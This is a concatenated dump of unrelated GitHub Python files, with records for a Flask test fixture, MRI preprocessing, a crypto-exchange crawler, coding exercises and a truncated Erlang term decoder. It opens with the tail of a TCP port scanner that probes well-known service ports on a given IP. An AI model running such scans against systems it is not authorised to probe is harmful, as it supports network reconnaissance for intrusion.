(SOCKetS)',\n 1194: 'OpenVPN',\n 1433: 'Microsoft SQL Server',\n 1434: 'Microsoft SQL Server',\n 1521: 'Oracle',\n 1723: 'PPTP (Point-to-Point Tunneling Protocol)',\n 3306: 'MySQL',\n 3389: 'RDP (Remote Desktop Protocol)',\n 5432: 'PostgreSQL',\n 5900: 'VNC (Virtual Network Computing)',\n 5901: 'VNC (Virtual Network Computing)',\n 5902: 'VNC (Virtual Network Computing)',\n 5903: 'VNC (Virtual Network Computing)',\n 6379: 'Redis',\n 8080: 'HTTP Alternate (http_alt)',\n 8443: 'HTTPS Alternate (https_alt)',\n 9000: 'Jenkins',\n 9090: 'HTTP Alternate (http_alt)',\n 9091: 'HTTP Alternate (http_alt)'\n }\n \n open_ports = False\n for port in tqdm(ports, leave=False):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(0.1)\n result = s.connect_ex((ip, port))\n if result == 0:\n service_name = socket.getservbyport(port)\n well_known_service = well_known_ports.get(port)\n if port in well_known_ports.keys():\n tqdm.write(f\"Porta \\033[35m{port}\\033[00m (\\033[33m{service_name}\\033[00m) \\033[32mSERVIÇO QUE DEVERIA RODAR: {well_known_service}\\033[00m - {ip}\")\n else:\n tqdm.write(f\"Porta \\033[35m{port}\\033[00m (\\033[33m{service_name}\\033[00m) \\033[031mSERVIÇO DESCONHECIDO\\033[00m - {ip}\")\n open_ports = True\n s.close()\n\n except:\n continue\n\n print(\"\\033[1;32mMapeamento completo!033[00m \\n\")\n\n if not open_ports:\n print(\"\\033[31mNenhuma porta aberta encontrada\\033[00m\")\n\n\nif __name__ == \"__main__\":\n inicio()","repo_name":"henriquemf/techack","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25823738646","text":"\"\"\"This makes the test configuration setup\"\"\"\n# pylint: disable=redefined-outer-name\nimport os\nimport pytest\n\nfrom flask.testing import FlaskClient\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import login_user, logout_user, current_user\n\nfrom app import create_app, db\nfrom app.db.models import User\n\n\ndb = SQLAlchemy()\n\n@pytest.fixture()\ndef application():\n \"\"\"This makes the app\"\"\"\n #os.environ['FLASK_ENV'] = 'development'\n os.environ['FLASK_ENV'] = 'testing'\n application = create_app()\n\n with application.app_context():\n db.create_all()\n yield application\n db.session.remove()\n db.drop_all()\n\n@pytest.fixture()\ndef app_client(application):\n ctx = application.test_request_context()\n ctx.push()\n application.test_client_class = FlaskClient\n return application.test_client()\n\n@pytest.fixture()\ndef add_user(application):\n with application.app_context():\n user = User('test@test.com', 'testtest')\n db.session.add(user)\n db.session.commit()\n\n\n@pytest.fixture()\ndef client(application):\n \"\"\"This makes the http client\"\"\"\n return application.test_client()\n\n\n@pytest.fixture()\ndef runner(application):\n \"\"\"This makes the task runner\"\"\"\n return application.test_cli_runner()","repo_name":"onahte/banking_web_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21069125985","text":"class Employee:\n def __init__(self,id,name,salary,desig):\n self.id=id\n self.name = name\n self.salary = salary\n self.desig = desig\n\n def __str__(self):\n return self.name\n\n\nobj1=Employee(100,'ajay',25000,'developer')\nobj2=Employee(101,'vijay',20000,'developer')\nobj3=Employee(102,'binoy',22000,'qa')\n\n#convert empolyee name upper case\n\nlst=[]\nlst.append(obj1)\nlst.append(obj2)\nlst.append(obj3)\n# for emp in lst:\n# print(emp)\nprint(lst)\nupnames=list(map(lambda emp:emp.name.upper(),lst))\nprint(upnames)","repo_name":"amalmhn/PythonDjangoProjects","sub_path":"functional_programming/map_reduce_filter/object_filter.py","file_name":"object_filter.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20244791450","text":"import time\nimport pandas as pd\n\n\ndef date_filter(date):\n # 判断输入日期距今是否超出 60 天\n\n if not date or date == \"-\":\n return \"未命中\"\n\n d = pd.to_datetime(date)\n n = pd.to_datetime(time.strftime(\"%Y.%m.%d, %H:%M:%S\"))\n\n if abs((d-n).days) > 60:\n return \"超过60天\"\n\n return \"少于60天\"\n\n\nif __name__ == \"__main__\":\n out_data = pd.read_csv(\"互联网边界防火墙内对外下载数据.csv\")\n out_data[\"上次命中时间\"] = out_data[\"最近命中时间\"].apply(date_filter)\n\n in_data = pd.read_csv(\"互联网边界防火墙外对内下载数据.csv\")\n in_data[\"上次命中时间\"] = in_data[\"最近命中时间\"].apply(date_filter)\n\n\n with pd.ExcelWriter(\"互联网边界防火墙策略_命中统计.xlsx\") as writer:\n out_data.to_excel(writer, sheet_name=\"内对外\", index=False)\n in_data.to_excel(writer, sheet_name=\"外对内\", index=False)\n","repo_name":"wyfffffei/network_utils","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23358671067","text":"import sys\nfrom collections import defaultdict\n\ndef lrud(r, c, N, M, planet):\n node = []\n if r-1 >= 0:\n if planet[r-1][c] != 1:\n node.append([r-1, c])\n else : \n if planet[N-1][c] != 1:\n node.append([N-1, c])\n\n if r+1 < N:\n if planet[r+1][c] != 1:\n node.append([r+1, c])\n else : \n if planet[0][c] != 1:\n node.append([0, c])\n \n if c+1 < M:\n if planet[r][c+1] != 1:\n node.append([r, c+1])\n else : \n if planet[r][0] != 1:\n node.append([r, 0])\n\n if c-1 >= 0:\n if planet[r][c-1] != 1:\n node.append([r, c-1])\n else : \n if planet[r][M-1] != 1:\n node.append([r, M-1])\n return node\n\ndef hashPlanet(N, M, planet):\n newPlanet = [[[]for _ in range(M)]for _ in range(N)]\n for r in range(N):\n for c in range(M):\n if planet[r][c] == 0:\n for n in lrud(r, c, N, M, planet):\n newPlanet[r][c].append(n)\n return newPlanet\n\ndef dfs(planet, hPlanet, r, c):\n stack = [[r, c]]\n visited = defaultdict(int)\n while stack:\n node = stack.pop()\n visited[node[0]*1000 + node[1]] = 1\n for n in hPlanet[node[0]][node[1]]:\n if visited[n[0]*1000 + n[1]] == 0:\n stack.append(n)\n planet[n[0]][n[1]] = 1\n return planet\n\nN, M = map(int, sys.stdin.readline().split())\n\nplanet = []\nfor n in range(N):\n planet.append(list(map(int, sys.stdin.readline().split())))\n \nhPlanet = hashPlanet(N, M, planet)\nanswer = 0\nfor n in range(N):\n for m in range(M):\n if planet[n][m] == 0:\n planet = dfs(planet, hPlanet, n , m)\n answer += 1\nprint(answer)","repo_name":"EnvyW6567/CodingTestAlgorithm","sub_path":"Wanted_CodingTest/DonutPlanet.py","file_name":"DonutPlanet.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35160494445","text":"from ..crawler.wallet import Metamask\nfrom typing import Optional\nfrom ..crawler.exchange.crawling import Crawling\nfrom ..base import Exchange\nfrom ..base.utils.retry import retry\nimport asyncio\n\n\nclass Liamaswap(Crawling, Exchange):\n def __init__(self, config_change: Optional[dict] = {}) -> None:\n super().__init__()\n\n config = {\n \"chainName\": \"MATIC\",\n \"exchangeName\": \"liamaswap\",\n \"retries\": 3,\n \"retriesTime\": 10,\n \"host\": None,\n \"account\": None,\n \"privateKey\": None,\n \"log\": None,\n \"proxy\": False,\n \"wallet_name\": \"Metamask\",\n \"wallet_config\": {},\n \"driver_path\": None,\n }\n\n config.update(config_change)\n\n # market info\n self.id = 13\n self.chainName = config[\"chainName\"]\n self.exchangeName = config[\"exchangeName\"]\n self.duration = False\n self.addNounce = 0\n self.retries = config[\"retries\"]\n self.retriesTime = config[\"retriesTime\"]\n self.host = config[\"host\"]\n self.account = config[\"account\"]\n self.privateKey = config[\"privateKey\"]\n self.log = config[\"log\"]\n self.proxy = config[\"proxy\"]\n self.wallet_name = config[\"wallet_name\"]\n self.wallet_config = config[\"wallet_config\"]\n self.driver_path = config[\"driver_path\"]\n\n self.load_exchange(self.chainName, self.exchangeName)\n\n self.set_logger(self.log)\n self.load_crawling()\n\n # site_config = self.set_site_config(self.chains['baseChain'], tokenA, tokenB)\n\n # @retry\n async def fetch_ticker(self, amountAin, tokenAsymbol, tokenBsymbol, **kwargs):\n best_route = None\n\n amountIn = amountAin\n\n tokenA = self.tokens[tokenAsymbol]\n tokenB = self.tokens[tokenBsymbol]\n\n tokenAaddress = tokenA[\"contract\"]\n tokenBaddress = tokenB[\"contract\"]\n\n site_config = self.set_site_config(self.chains[\"baseChain\"], tokenAaddress, tokenBaddress)\n self.set_site(site_config)\n self.click_liama_hide_ip()\n self.input_liama_size(amountAin)\n\n self.click_liama_perform_reload()\n\n route_lists = self.click_liama_perform_route()\n\n route_lists = list(map(lambda x: x[-1].lower(), route_lists))\n\n self.load_markets(self.chainName, None)\n\n for route_list in route_lists:\n if route_list in self.markets:\n best_route = route_list\n\n return best_route\n\n def set_site_config(self, chain, tokenA, tokenB):\n site_config1 = {\"chain\": chain}\n\n site_config2 = {\"from\": tokenA, \"to\": tokenB}\n\n site_config = [(\"?\", site_config1), (\"&\", site_config2)]\n\n return site_config\n","repo_name":"munsunouk/ccdxt","sub_path":"exchange/liamaswap.py","file_name":"liamaswap.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"18198949615","text":"# Brain Tumor Classification\n# Enhance tumor region in each image.\n# Author: Qixun QU\n# Copyleft: MIT Licience\n\n# ,,, ,,,\n# ;\" '; ;' \",\n# ; @.ss$$$$$$s.@ ;\n# `s$$$$$$$$$$$$$$$'\n# $$$$$$$$$$$$$$$$$$\n# $$$$P\"\"Y$$$Y\"\"W$$$$$\n# $$$$ p\"$$$\"q $$$$$\n# $$$$ .$$$$$. $$$$'\n# $$$DaU$$O$$DaU$$$'\n# '$$$$'.^.'$$$$'\n# '&$$$$$&'\n\n\nfrom __future__ import print_function\n\n\nimport os\nimport warnings\nimport numpy as np\nimport nibabel as nib\n\nfrom multiprocessing import Pool, cpu_count\nfrom scipy.ndimage.interpolation import zoom\n\n\n# Ignore the warning caused by SciPy\nwarnings.simplefilter(\"ignore\", UserWarning)\n\n\n# Helper function to run in multiple processes\ndef unwrap_preprocess(arg, **kwarg):\n return BTCPreprocess._preprocess(*arg, **kwarg)\n\n\nclass BTCPreprocess(object):\n\n def __init__(self, input_dirs, output_dirs, volume_type=\"t1ce\"):\n '''__INIT__\n\n Generates paths for preprocessing.\n Variables:\n - self.in_paths: a list contains path of each input image.\n - self.out_paths: a list provides path for each output image.\n - self.mask_paths: a list contains path of mask for each input image.\n\n Inputs:\n -------\n\n - input_dirs: a list with two lists, [hgg_input_dir, lgg_input_dir],\n path of the directory which saves input images of\\\n HGG and LGG subjects.\n - output_dirs: a list with teo lists, [hgg_output_dir, lgg_output_dir],\n path of output directory for every subject in HGG and LGG.\n - volume_type: string, type of brain volume, one of \"t1ce\", \"t1\", \"t2\"\n or \"flair\". Default is \"t1ce\".\n\n '''\n\n self.in_paths, self.out_paths, self.mask_paths = \\\n self.generate_paths(input_dirs, output_dirs, volume_type)\n\n return\n\n def run(self, is_mask=True, non_mask_coeff=0.333, processes=-1):\n '''RUN\n\n Function to map task to multiple processes.\n\n Inputs:\n -------\n\n - is_mask: boolearn, if True, enhance tumor region.\n Default is True.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. Default is 0.333.\n - processes: int, the number of processes used. Default is -1,\n which means use all processes.\n\n '''\n\n print(\"\\nPreprocessing on the sample in BraTS dataset.\\n\")\n num = len(self.in_paths)\n\n # Generate parameters\n paras = zip([self] * num, self.in_paths, self.out_paths, self.mask_paths,\n [is_mask] * num, [non_mask_coeff] * num)\n\n # Set the number of processes\n if processes == -1 or processes > cpu_count():\n processes = cpu_count()\n\n # Map task\n pool = Pool(processes=processes)\n pool.map(unwrap_preprocess, paras)\n\n return\n\n def _preprocess(self, in_path, to_path, mask_path,\n is_mask=True, non_mask_coeff=0.333):\n '''_PREPROCESS\n\n For each input image, four steps are done:\n -1- If is_mask, enhance tumor region.\n -2- Remove background.\n -3- Resize image.\n -4- Save image.\n\n Inputs:\n -------\n\n - in_path: string, path of input image.\n - to_path: string, path of output image.\n - mask_path: string, path of the mask of input image.\n - is_mask: boolearn, if True, enhance tumor region.\n Default is True.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. Default is 0.333.\n\n '''\n\n try:\n print(\"Preprocessing on: \" + in_path)\n # Load image\n volume = self.load_nii(in_path)\n if is_mask:\n # Enhance tumor region\n mask = self.load_nii(mask_path)\n volume = self.segment(volume, mask, non_mask_coeff)\n # Removce background\n volume = self.trim(volume)\n # Resize image\n volume = self.resize(volume, [112, 112, 96])\n # Save image\n self.save2nii(to_path, volume)\n except RuntimeError:\n print(\"\\tFailed to rescal:\" + in_path)\n return\n\n return\n\n @staticmethod\n def generate_paths(in_dirs, out_dirs, volume_type=None):\n '''GENERATE_PATHS\n\n Generates three lists with files' paths for prerprocessing.\n\n Inputs:\n -------\n\n - input_dirs: a list with two lists, [hgg_input_dir, lgg_input_dir],\n path of the directory which saves input images of\\\n HGG and LGG subjects.\n - output_dirs: a list with teo lists, [hgg_output_dir, lgg_output_dir],\n path of output directory for every subject in HGG and LGG.\n - volume_type: string, type of brain volume, one of \"t1ce\", \"t1\", \"t2\"\n or \"flair\". Default is \"t1ce\".\n\n Outputs:\n --------\n\n - in_paths: a list contains path of each input image.\n - out_paths: a list provides path for each output image.\n - mask_paths: a list contains path of mask for each input image.\n\n '''\n\n # Function to create new directory\n # according to given path\n def create_dir(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n return\n\n in_paths, out_paths, mask_paths = [], [], []\n for in_dir, out_dir in zip(in_dirs, out_dirs):\n # For HGG or LFF subjects\n if not os.path.isdir(in_dir):\n print(\"Input folder {} is not exist.\".format(in_dir))\n continue\n\n # Create output folder for HGG or LGG subjects\n create_dir(out_dir)\n\n for subject in os.listdir(in_dir):\n # For each subject in HGG or LGG\n subject_dir = os.path.join(in_dir, subject)\n subject2dir = os.path.join(out_dir, subject)\n # Create folder for output\n create_dir(subject2dir)\n\n scan_names = os.listdir(subject_dir)\n # Get path of mask file\n for scan_name in scan_names:\n if \"seg\" in scan_name:\n scan_mask_path = os.path.join(subject_dir, scan_name)\n\n for scan_name in scan_names:\n if \"seg\" in scan_name:\n continue\n\n if volume_type is not None:\n if volume_type not in scan_name:\n continue\n\n # When find the target volume, save its path\n # and save paths for its output and mask\n in_paths.append(os.path.join(subject_dir, scan_name))\n out_paths.append(os.path.join(subject2dir, scan_name))\n mask_paths.append(scan_mask_path)\n\n return in_paths, out_paths, mask_paths\n\n @staticmethod\n def load_nii(path):\n '''LOAD_NII\n\n Load image to numpy ndarray from NIfTi file.\n\n Input:\n ------\n\n - path: string , path of input image.\n\n Ouput:\n ------\n\n - A numpy array of input imgae.\n\n '''\n\n return np.rot90(nib.load(path).get_data(), 3)\n\n @staticmethod\n def segment(volume, mask, non_mask_coeff=0.333):\n '''SEGMENT\n\n Enhance tumor region by suppressing non-tumor region\n with a coefficient.\n\n Inuuts:\n -------\n\n - volume: numpy ndarray, input image.\n - mask: numpy ndarray, mask with segmentation labels.\n - non_mask_coeff: float from 0 to 1, the coefficient of\n voxels in non-tumor region. Default is 0.333.\n\n Output:\n -------\n\n - segged: numpy ndarray, tumor enhanced image.\n\n '''\n\n # Set background to 0\n if np.min(volume) != 0:\n volume -= np.min(volume)\n\n # Suppress non-tumor region\n non_mask_idx = np.where(mask == 0)\n segged = np.copy(volume)\n segged[non_mask_idx] = segged[non_mask_idx] * non_mask_coeff\n\n return segged\n\n @staticmethod\n def trim(volume):\n '''TRIM\n\n Remove unnecessary background around brain.\n\n Input:\n ------\n\n - volume: numpy ndarray, input image.\n\n Output:\n -------\n\n - trimmed: numpy ndarray, image without unwanted background.\n\n '''\n\n # Get indices of slices that have brain's voxels\n non_zero_slices = [i for i in range(volume.shape[-1])\n if np.sum(volume[..., i]) > 0]\n # Remove slices that only have background\n volume = volume[..., non_zero_slices]\n\n # In each slice, find the minimum area of brain\n # Coordinates of area are saved\n row_begins, row_ends = [], []\n col_begins, col_ends = [], []\n for i in range(volume.shape[-1]):\n non_zero_pixels = np.where(volume > 0)\n row_begins.append(np.min(non_zero_pixels[0]))\n row_ends.append(np.max(non_zero_pixels[0]))\n col_begins.append(np.min(non_zero_pixels[1]))\n col_ends.append(np.max(non_zero_pixels[1]))\n\n # Find the maximum area from all minimum areas\n row_begin, row_end = min(row_begins), max(row_ends)\n col_begin, col_end = min(col_begins), max(col_ends)\n\n # Generate a minimum square area taht includs the maximum area\n rows_num = row_end - row_begin\n cols_num = col_end - col_begin\n more_col_len = rows_num - cols_num\n more_col_len_left = more_col_len // 2\n more_col_len_right = more_col_len - more_col_len_left\n col_begin -= more_col_len_left\n col_end += more_col_len_right\n len_of_side = rows_num + 1\n\n # Remove unwanted background\n trimmed = np.zeros([len_of_side, len_of_side, volume.shape[-1]])\n for i in range(volume.shape[-1]):\n trimmed[..., i] = volume[row_begin:row_end + 1,\n col_begin:col_end + 1, i]\n return trimmed\n\n @staticmethod\n def resize(volume, target_shape=[112, 112, 96]):\n '''RESIZE\n\n Resize input image to target shape.\n -1- Resize to [112, 112, 96].\n -2- Crop image to [112, 96, 96].\n\n '''\n\n # Shape of input image\n old_shape = list(volume.shape)\n\n # Resize image\n factor = [n / float(o) for n, o in zip(target_shape, old_shape)]\n resized = zoom(volume, zoom=factor, order=1, prefilter=False)\n\n # Crop image\n resized = resized[:, 8:104, :]\n\n return resized\n\n @staticmethod\n def save2nii(to_path, volume):\n '''SAVE2NII\n\n Save numpy ndarray to NIfTi image.\n\n Input:\n ------\n\n - to_path: string, path of output image.\n - volume: numpy ndarray, preprocessed image.\n\n '''\n # Rotate image to standard space\n volume = volume.astype(np.int16)\n volume = np.rot90(volume, 3)\n\n # Convert to NIfTi\n volume_nii = nib.Nifti1Image(volume, np.eye(4))\n # Save image\n nib.save(volume_nii, to_path)\n\n return\n\n\nif __name__ == \"__main__\":\n\n # Set path for input directory\n parent_dir = os.path.dirname(os.getcwd())\n data_dir = os.path.join(parent_dir, \"data\")\n hgg_input_dir = os.path.join(data_dir, \"HGG\")\n lgg_input_dir = os.path.join(data_dir, \"LGG\")\n input_dirs = [hgg_input_dir, lgg_input_dir]\n\n # Generate Enhanced Tumor\n is_mask = True\n non_mask_coeff = 0.333\n # Set path for output directory\n hgg_output_dir = os.path.join(data_dir, \"HGGSegTrimmed\")\n lgg_output_dir = os.path.join(data_dir, \"LGGSegTrimmed\")\n output_dirs = [hgg_output_dir, lgg_output_dir]\n\n prep = BTCPreprocess(input_dirs, output_dirs, \"t1ce\")\n prep.run(non_mask_coeff=non_mask_coeff,\n is_mask=is_mask, processes=-1)\n\n # Generate Non-Enhanced Tumor\n is_mask = False\n # Set path for output directory\n hgg_output_dir = os.path.join(data_dir, \"HGGTrimmed\")\n lgg_output_dir = os.path.join(data_dir, \"LGGTrimmed\")\n output_dirs = [hgg_output_dir, lgg_output_dir]\n\n prep = BTCPreprocess(input_dirs, output_dirs, \"t1ce\")\n prep.run(is_mask=is_mask, processes=-1)\n","repo_name":"quqixun/BTClassification","sub_path":"src/btc_preprocess.py","file_name":"btc_preprocess.py","file_ext":"py","file_size_in_byte":12756,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"14082999447","text":"# coding: utf-8\n\n\"\"\"\nContain solution for the python/numpy training\n\"\"\"\n\n__authors__ = [\"Pierre Knobel\", \"Jerome Kieffer\", \"Henri Payno\",\n \"Armando Sole\", \"Valentin Valls\", \"Thomas Vincent\"]\n__date__ = \"18/09/2018\"\n__license__ = \"MIT\"\n\n\nimport numpy\nimport os\n\n\ndef solution(file_path):\n \"\"\"Solution to the io notebook exercise\"\"\"\n raw_data = load_data(file_path)\n proc_data, mask = process_data(data=raw_data)\n save_data(mask=mask, proc_data=proc_data, raw_data=raw_data,\n output_file='process.h5')\n list_root('process.h5')\n return raw_data, proc_data, mask\n\n\ndef load_data(file_path):\n \"\"\"load data contained in data/medipix.edf\"\"\"\n import fabio\n data = fabio.open(file_path).data\n return data\n\n\ndef process_data(data):\n \"\"\"\n Process the data The goal of the processing is to clamp the pixels values\n to a new range of values ([10%, 90%] of the existing one). To do so:\n\n * Create a mask to detect pixel which are below 10% \n * With the above mask, set the affected pixels to the 10% 'low value'.\n * do the same for value above 90%\n * create the mask of all the modify pixel\n\n \"\"\"\n maxi = data.max()\n mini = data.min()\n \n val_10 = 0.9*mini + 0.1*maxi\n val_90 = 0.1*mini + 0.9*maxi\n mask_10 = (data <= val_10)\n mask_90 = (data >= val_90)\n mask = numpy.logical_or(mask_10, mask_90)\n\n proc_data = numpy.copy(data)\n proc_data[mask_10] = val_10\n proc_data[mask_90] = val_90\n return proc_data, mask\n\n\ndef save_data(mask, proc_data, raw_data, output_file):\n \"\"\"\n save mask, proc_data and raw_data into output_file\n \"\"\"\n import h5py\n with h5py.File(output_file, \"w\") as h5_file:\n h5_file['/mask'] = mask\n h5_file['/result'] = proc_data\n h5_file['/raw'] = raw_data\n\n\ndef list_root(file_path):\n \"\"\"List dataset / group contained at the root level\"\"\"\n import h5py\n assert os.path.exists(file_path)\n h5_file = h5py.File(file_path)\n print('root level:')\n print(list(h5_file['/'].keys()))\n","repo_name":"aicampbell/silx-training","sub_path":"python/io/exercicesolution.py","file_name":"exercicesolution.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"74237039306","text":"from models.User.UserModel import UserModel\n\nclass UserConfirmCRUD():\n \n @classmethod\n def update_acc_verified(cls, token):\n active = UserModel.activate_account(token)\n if active:\n return { \"status\": 200,\n \"message\": \"Account has been Activated successfully\"\n }\n else:\n return { \"status\": 401,\n \"message\": \"failed the Activation\"\n }","repo_name":"Al-Alloush/Python-WebAPI","sub_path":"web_api/controllers/User/userConfirm_crud.py","file_name":"userConfirm_crud.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5365317383","text":"def bekeres_nev():\n neve = input('Adja meg a nevét:')\n return neve\n\ndef bekeres_szulev():\n szulev = input('Adja meg a születési évét:')\n return szulev\n\n\nnev = \"unknown\"\nwhile nev != \"\":\n nev = bekeres_nev()\n print(nev)\n if nev != \"\":\n print(bekeres_szulev())\n","repo_name":"benneleszek/python-2022-02-28","sub_path":"bekeresek.py","file_name":"bekeresek.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18094322064","text":"#Stephanie Bravo\n#April 3, 2019\n#This program will creates a map with markers for all the traffic collisions from the input file.\n\nimport folium\nimport pandas as pd\n\n#Ask for the CSV file\n\ncuny= pd.read_csv(input(\"Enter CSV file name:\"))\noutputfile = input(\"Enter output file:\")\n\n#Create a map, centered around hunter\nmapCUNY = folium.Map(location=[40.75, -74.125])\nfor index,row in cuny.iterrows():\n lat= row[\"LATITUDE\"]\n lon= row[\"LONGITUDE\"]\n newMarker = folium.Marker([lat,lon])\n newMarker.add_to(mapCUNY)\n\n#Save the map:\nmapCUNY.save(outfile = outputfile)\n\n\n# columns names are \"LATITUDE\" and \"LONGITUDE\"\n\n#\"TIME\") to label each marker and changed\n#the underlying map with the option: tiles=\"Cartodb Positron\" when creating the map.)\n","repo_name":"stephanieb00/CSCI127","sub_path":"Python Work/Lab 9/Assignment43.py","file_name":"Assignment43.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31340869466","text":"import math as m\n\nnum = int(input('\\nEntre com um número de 3 dígitos: '))\nc = num // 100\nd = num % 100 // 10\nu = num % 10\nnum1 = u*100 + d*10 + c\nprint(f'\\nNumero: {num} ')\nprint(f'\\nInvertido: {int(num1)} ')\nprint('\\n')\n","repo_name":"ElbertJean/faculdade","sub_path":"1-Semestre/Algoritmos/Lista04-10Set/exercicio_47.py","file_name":"exercicio_47.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44771143607","text":"'''\nHackerLand University has the following grading policy:\n\nEvery student receives a in the inclusive range from to .\nAny less than is a failing grade.\nSam is a professor at the university and likes to round each student's according to these rules:\n\nIf the difference between the and the next multiple of is less than , round up to the next multiple of .\nIf the value of is less than , no rounding occurs as the result will still be a failing grade.\n'''\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'gradingStudents' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY grades as parameter.\n#\n\ndef gradingStudents(grades):\n for id,val in enumerate(grades):\n if val >= 38:\n rem = val % 5\n div = val // 5\n\n if rem != 0 and rem > 2:\n val += 5 - rem\n grades[id] = val\n \n return grades\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n grades_count = int(input().strip())\n\n grades = []\n\n for _ in range(grades_count):\n grades_item = int(input().strip())\n grades.append(grades_item)\n\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"ssingh2409/codingPractise","sub_path":"HackerRank/Problem_Solving/Grading Students.py","file_name":"Grading Students.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1648552624","text":"\nfrom __future__ import division\n\nimport struct\nimport zlib\n\nfrom erlastic.constants import *\nfrom erlastic.types import *\n\n__all__ = [\"ErlangTermEncoder\", \"ErlangTermDecoder\", \"EncodingError\"]\n\nclass EncodingError(Exception):\n pass\n\nclass ErlangTermDecoder(object):\n def __init__(self, encoding=None):\n self.encoding = encoding\n # Cache decode functions to avoid having to do a getattr\n self.decoders = {}\n for k in self.__class__.__dict__:\n v = getattr(self, k)\n if callable(v) and k.startswith('decode_'):\n self.decoders[k.split('_')[1]] = v\n\n def decode(self, bytes, offset=0):\n version = ord(bytes[offset])\n if version != FORMAT_VERSION:\n raise EncodingError(\"Bad version number. Expected %d found %d\" % (FORMAT_VERSION, version))\n return self.decode_part(bytes, offset+1)[0]\n\n def decode_part(self, bytes, offset=0):\n return self.decoders[bytes[offset]](bytes, offset+1)\n\n def decode_a(self, bytes, offset):\n \"\"\"SMALL_INTEGER_EXT\"\"\"\n return ord(bytes[offset]), offset+1\n\n def decode_b(self, bytes, offset):\n \"\"\"INTEGER_EXT\"\"\"\n return struct.unpack(\">l\", bytes[offset:offset+4])[0], offset+4\n\n def decode_c(self, bytes, offset):\n \"\"\"FLOAT_EXT\"\"\"\n return float(bytes[offset:offset+31].split('\\x00', 1)[0]), offset+31\n\n def decode_F(self, bytes, offset):\n \"\"\"NEW_FLOAT_EXT\"\"\"\n return struct.unpack(\">d\", bytes[offset:offset+8])[0], offset+8\n\n def decode_d(self, bytes, offset):\n \"\"\"ATOM_EXT\"\"\"\n atom_len = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n atom = bytes[offset+2:offset+2+atom_len]\n return self.convert_atom(atom), offset+atom_len+2\n\n def decode_s(self, bytes, offset):\n \"\"\"SMALL_ATOM_EXT\"\"\"\n atom_len = ord(bytes[offset])\n atom = bytes[offset+1:offset+1+atom_len]\n return self.convert_atom(atom), offset+atom_len+1\n\n def decode_h(self, bytes, offset):\n \"\"\"SMALL_TUPLE_EXT\"\"\"\n arity = ord(bytes[offset])\n offset += 1\n\n items = []\n for i in range(arity):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n return tuple(items), offset\n\n def decode_i(self, bytes, offset):\n \"\"\"LARGE_TUPLE_EXT\"\"\"\n arity = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n\n items = []\n for i in range(arity):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n return tuple(items), offset\n\n def decode_j(self, bytes, offset):\n \"\"\"NIL_EXT\"\"\"\n return [], offset\n\n def decode_k(self, bytes, offset):\n \"\"\"STRING_EXT\"\"\"\n length = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n st = bytes[offset+2:offset+2+length]\n if self.encoding:\n try:\n st = st.decode(self.encoding)\n except UnicodeError:\n st = [ord(x) for x in st]\n else:\n st = [ord(x) for x in st]\n return st, offset+2+length\n\n def decode_l(self, bytes, offset):\n \"\"\"LIST_EXT\"\"\"\n length = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n items = []\n for i in range(length):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n tail, offset = self.decode_part(bytes, offset)\n if tail != []:\n # TODO: Not sure what to do with the tail\n raise NotImplementedError(\"Lists with non empty tails are not supported\")\n return items, offset\n\n def decode_m(self, bytes, offset):\n \"\"\"BINARY_EXT\"\"\"\n length = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n return bytes[offset+4:offset+4+length], offset+4+length\n\n def decode_n(self, bytes, offset):\n \"\"\"SMALL_BIG_EXT\"\"\"\n n = ord(bytes[offset])\n offset += 1\n return self.decode_bigint(n, bytes, offset)\n\n def decode_o(self, bytes, 